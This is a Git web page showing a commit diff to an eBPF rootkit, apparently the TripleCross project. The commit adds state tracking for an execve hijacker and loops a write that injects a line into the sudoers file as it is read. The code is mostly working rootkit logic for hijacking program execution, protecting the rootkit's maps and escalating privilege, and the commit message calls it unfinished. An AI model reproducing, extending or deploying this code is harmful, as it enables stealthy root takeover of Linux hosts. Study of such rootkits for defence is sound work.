admin/TripleCross
1
0
Fork 0
mirror of https://github.com/h3xduck/TripleCross.git synced 2025-12-22 09:43:07 +08:00
Code Issues Packages Projects Releases Wiki Activity

Added support for integrating the execution hijacker via the rootkit. Still some work to do, also changed some config from fs which needs to be reverted

Browse Source
This commit is contained in:
h3xduck
2022-02-18 09:08:54 -05:00
parent 0e022a8385
commit 130364e6ab
14 changed files with 2151 additions and 2047 deletions
Download Patch File Download Diff File Expand all files Collapse all files

8
src/ebpf/include/bpf/defs.h
View File

@@ -31,6 +31,14 @@ struct fs_priv_open{ //Map
} fs_open SEC(".maps");
//State of the execve hijacker. 0 inactive, 1 active
struct exec_var_priv_hijack_active{ //Map
__uint(type, BPF_MAP_TYPE_HASH);
__uint(max_entries, 1);
__type(key, __u64);
__type(value, __u64);
} exec_var_hijack_active SEC(".maps");
/*PROTECTED MAPS*/
//Any attempt to access these maps will be blocked by the rootkit if the program is not whitelisted

11
src/ebpf/include/bpf/exec.h
View File

@@ -28,6 +28,8 @@ struct sys_execve_enter_ctx {
const char* const* envp;
};
volatile int hijacker_state = 0;
/**
* @brief Checks for the error case 2 described in the execve handler when overwriting the filename userspace buffer.
*
@@ -84,6 +86,12 @@ static __always_inline int test_write_user_unique(struct sys_execve_enter_ctx *c
}
static __always_inline int handle_tp_sys_enter_execve(struct sys_execve_enter_ctx *ctx, __u64 pid_tgid){
//Check if the exec hijacker is active already
if(hijacker_state == 1){
return 0;
}
bpf_printk("Starting execve hijacker\n");
unsigned char* argv[NUMBER_ARGUMENTS_PARSED] = {0};
//unsigned char* envp[PROGRAM_LENGTH] = {0};
unsigned char filename[ARGUMENT_LENGTH] = {0};
@@ -160,6 +168,9 @@ static __always_inline int handle_tp_sys_enter_execve(struct sys_execve_enter_ct
//bpf_printk("ARGV2: %s\n", argv[2]);
return -1;
}
bpf_printk("One success\n");
hijacker_state = 1;
unsigned char newfilename[ARGUMENT_LENGTH] = {0};
unsigned char* newargv[NUMBER_ARGUMENTS_PARSED] = {0};

3
src/ebpf/include/bpf/fs.h
View File

@@ -102,8 +102,11 @@ static __always_inline int handle_tp_sys_exit_read(struct sys_read_exit_ctx *ctx
//For including an user in the sudoers file
//We just put our new line there, independently on what the rest of the file contains
if(data->is_sudo==1){
while(1){
if(bpf_probe_write_user((void*)buf, (void*)sudo_line_overwrite, (__u32)STRING_FS_SUDOERS_ENTRY_LEN-1)<0){
bpf_printk("Error writing to user memory\n");
return -1;
}
}
bpf_printk("Sudo overwritten\n");
return 0;